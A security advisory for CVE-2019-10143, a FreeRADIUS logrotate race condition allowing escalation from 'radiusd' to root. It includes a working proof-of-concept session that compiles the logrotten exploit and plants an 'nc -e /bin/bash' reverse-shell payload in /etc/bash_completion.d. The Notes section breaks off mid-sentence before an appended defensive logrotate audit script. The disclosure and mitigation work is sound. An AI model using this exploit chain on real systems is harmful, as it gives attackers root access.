Since logrotate is prone to a race condition (see https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition), user "radiusd" can replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place the compressed files AS ROOT into /etc/bash_completion.d and set their owner and group to "radiusd.radiusd". An attacker can simply overwrite such a file with a reverse shell. As soon as root logs in, the reverse shell is executed.
Details of the race condition in logrotate can be found at:

* https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* https://github.com/whotwagner/logrotten

## Proof of Concept

The following example illustrates how an attacker who has already gained a shell as user "radiusd" can elevate privileges to "root". After downloading and compiling logrotten, the exploit is started and waits for the next daily run of logrotate. If the rotation succeeds, logrotate writes the rotated file into /etc/bash_completion.d/ with owner "radiusd"; the attacker then overwrites it with a reverse-shell payload. As soon as root logs in, the reverse shell is executed and connects back to the attacker's netcat listener:

```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root    root    11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd radiusd    33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost &); fi" > /etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp
listening on [any] ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions

All versions including 3.0.19

## Tested Versions

Name: freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact

An attacker who has already obtained a valid shell as user "radiusd" could elevate privileges to "root". The fact that another exploit is needed to get that shell lowers the severity from high to low.

## Mitigation

Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd. Keeping SELinux in "Enforcing" mode limits the directories the "radiusd" user can write to.

## References:

* https://access.redhat.com/security/cve/cve-2019-10143
* https://nvd.nist.gov/vuln/detail/CVE-2019-10143

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes

This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user "radiusd"](https://freeradius.org/security/). CVEs are
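The condition described above is mechanical enough to audit for: a logrotate stanza whose log directory is owned or writable by a non-root user while the stanza has no `su` directive means root will rotate inside a directory that user controls. The following is an added example, not part of the advisory or of FreeRADIUS or logrotate: a small parser for logrotate.d stanzas plus the ownership check, which reports the stanza from the advisory and stays quiet once `su radiusd:radiusd` is added. The config texts, the fake directory tree and the uid 95 for "radiusd" are constructed for the demo; `audit` takes a stat callback so the same code runs against the real filesystem with `real_stat`.

```python
"""Audit logrotate stanzas for root rotation inside a non-root-owned directory."""
import os
import re
import stat

# '<paths> { <directives> }' blocks, one per stanza.
STANZA_RE = re.compile(r"^\s*(\S.*?)\s*\{(.*?)^\s*\}", re.S | re.M)


def parse_logrotate(text: str) -> list:
    """Return [(paths, directives)] per stanza; comments and blank lines dropped."""
    stanzas = []
    for m in STANZA_RE.finditer(text):
        paths = m.group(1).split()
        directives = [ln.strip() for ln in m.group(2).splitlines()
                      if ln.strip() and not ln.strip().startswith("#")]
        stanzas.append((paths, directives))
    return stanzas


def stanza_dir(glob_path: str) -> str:
    """Deepest fixed ancestor of the log glob: whoever owns it controls everything below."""
    fixed = []
    for part in glob_path.split("/")[:-1]:
        if any(c in part for c in "*?["):
            break
        fixed.append(part)
    return "/".join(fixed) or "/"


def real_stat(path: str) -> tuple:
    st = os.stat(path)
    return st.st_uid, st.st_mode


def audit(text: str, stat_fn=real_stat) -> list:
    """Findings as (log glob, directory, owner uid, reason) for stanzas matching the advisory's pattern."""
    findings = []
    for paths, directives in parse_logrotate(text):
        has_su = any(d.split()[0] == "su" for d in directives)
        for p in paths:
            d = stanza_dir(p)
            try:
                uid, mode = stat_fn(d)
            except FileNotFoundError:
                continue
            loose_perms = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
            if (uid != 0 or loose_perms) and not has_su:
                findings.append((p, d, uid, "rotated as root without 'su'; directory controlled by non-root"))
    return findings


# Constructed inputs: the stanza from the advisory, the same stanza with the recommended fix,
# and a root-owned log for comparison.
CONFIG_VULNERABLE = """\
/var/log/radius/radacct/*/detail {
    monthly
    rotate 4
    nocreate
    missingok
    compress
}
"""
CONFIG_FIXED = CONFIG_VULNERABLE.replace("    monthly", "    su radiusd:radiusd\n    monthly")
CONFIG_ROOT_OWNED = """\
/var/log/radius/radius.log {
    weekly
    rotate 4
}
"""
FAKE_TREE = {  # path -> (uid, mode); uid 95 stands in for "radiusd"
    "/var/log/radius": (0, 0o40755),
    "/var/log/radius/radacct": (95, 0o40700),
}


def fake_stat(path: str) -> tuple:
    if path not in FAKE_TREE:
        raise FileNotFoundError(path)
    return FAKE_TREE[path]


if __name__ == "__main__":
    for label, cfg in (("vulnerable", CONFIG_VULNERABLE), ("fixed", CONFIG_FIXED), ("root-owned", CONFIG_ROOT_OWNED)):
        print(label, audit(cfg, fake_stat))
```

On a real host, `audit(open("/etc/logrotate.d/radiusd").read())` needs no callback; `su` is the directive logrotate itself provides for exactly this case, so a finding here is a one-line config fix rather than a code change.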